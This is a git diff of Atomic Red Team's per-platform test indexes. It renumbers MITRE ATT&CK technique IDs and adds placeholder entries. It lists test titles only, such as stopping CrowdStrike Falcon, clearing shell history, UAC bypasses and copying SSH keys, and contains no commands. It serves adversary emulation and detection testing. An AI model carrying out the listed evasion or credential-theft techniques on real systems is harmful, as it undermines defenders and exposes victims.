- Atomic Test #3: Disable SELinux [linux]
- Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.004 File Deletion](../../T1551.004/T1551.004.md)
+- [T1070.004 File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
@@ -174,13 +184,15 @@
- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
+- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1551 Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- Atomic Test #2: Install root CA on Debian/Ubuntu [linux]
@@ -201,9 +213,12 @@
- T1036.004 Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -211,11 +226,12 @@
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #2: Masquerading as Linux crond process. [linux]
-- T1536 Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
+- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
@@ -230,12 +246,12 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.006 Timestomp](../../T1551.006/T1551.006.md)
+- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -324,6 +340,7 @@
- [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #3: Security Software Discovery - ps [linux, macos]
- T1518 Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
@@ -335,6 +352,9 @@
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [linux, macos]
+- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# lateral-movement
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -354,6 +374,7 @@
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.004 DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -387,7 +408,7 @@
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -396,7 +417,7 @@
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.001 Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -437,23 +458,26 @@
# execution
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1059.004 Bash](../../T1059.004/T1059.004.md)
- - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- - Atomic Test #2: Command-Line Interface [macos, linux]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204.002 Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1106 Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
+ - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
+ - Atomic Test #2: Command-Line Interface [macos, linux]
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.005 Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# exfiltration
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -487,6 +511,7 @@
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md
index 6e1fd445..9b86df85 100644
--- a/atomics/Indexes/Indexes-Markdown/macos-index.md
+++ b/atomics/Indexes/Indexes-Markdown/macos-index.md
@@ -32,9 +32,7 @@
- Atomic Test #1: Logon Scripts - Mac [macos]
- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
- Atomic Test #1: Plist Modification [macos]
-- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
@@ -53,13 +51,13 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
-- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# persistence
- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
+- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
@@ -96,18 +94,19 @@
- Atomic Test #1: Logon Scripts - Mac [macos]
- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
- Atomic Test #1: Plist Modification [macos]
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications [macos]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1098.004 SSH Authorized Keys [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.005 Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -117,18 +116,19 @@
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
-- [T1551.003 Clear Command History](../../T1551.003/T1551.003.md)
+- [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux, macos]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
-- [T1551.002 Clear Linux or Mac System Logs](../../T1551.002/T1551.002.md)
+- [T1070.002 Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.004 Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.004 Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #5: Disable Carbon Black Response [macos]
@@ -138,9 +138,10 @@
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.004 File Deletion](../../T1551.004/T1551.004.md)
+- [T1070.004 File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -149,6 +150,7 @@
- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
+- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
@@ -161,8 +163,9 @@
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1551 Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #3: Install root CA on macOS [macos]
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -180,16 +183,17 @@
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.003 Rename System Utilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1014 Rootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
@@ -208,14 +212,13 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.006 Timestomp](../../T1551.006/T1551.006.md)
+- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -290,6 +293,7 @@
- [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #3: Security Software Discovery - ps [linux, macos]
- T1518 Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #2: System Information Discovery [macos]
- Atomic Test #3: List OS Information [linux, macos]
@@ -300,37 +304,44 @@
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [linux, macos]
+- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# execution
- [T1059.002 AppleScript](../../T1059.002/T1059.002.md)
- Atomic Test #1: AppleScript [macos]
-- [T1059.004 Bash](../../T1059.004/T1059.004.md)
- - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- - Atomic Test #2: Command-Line Interface [macos, linux]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1569.001 Launchctl](../../T1569.001/T1569.001.md)
- Atomic Test #1: Launchctl [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
- Atomic Test #1: Event Monitor Daemon Persistence [macos]
- T1204.002 Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1106 Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
+ - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
+ - Atomic Test #2: Command-Line Interface [macos, linux]
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.005 Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# command-and-control
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.004 DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -365,7 +376,7 @@
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -374,7 +385,7 @@
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.001 Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -450,12 +461,14 @@
- Atomic Test #1: Keychain [macos]
- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #2: Packet Capture macOS [macos]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 2958ec49..8deb5326 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -26,6 +26,7 @@
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
+- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
@@ -137,7 +138,8 @@
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
-- [T1551.001 Clear Windows Event Logs](../../T1551.001/T1551.001.md)
+- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1070.001 Clear Windows Event Logs](../../T1070.001/T1070.001.md)
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: Delete System Logs Using Clear-EventLogId [windows]
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -185,11 +187,12 @@
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.004 File Deletion](../../T1551.004/T1551.004.md)
+- [T1070.004 File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #4: Delete a single file - Windows cmd [windows]
- Atomic Test #5: Delete an entire folder - Windows cmd [windows]
- Atomic Test #6: Delete a single file - Windows PowerShell [windows]
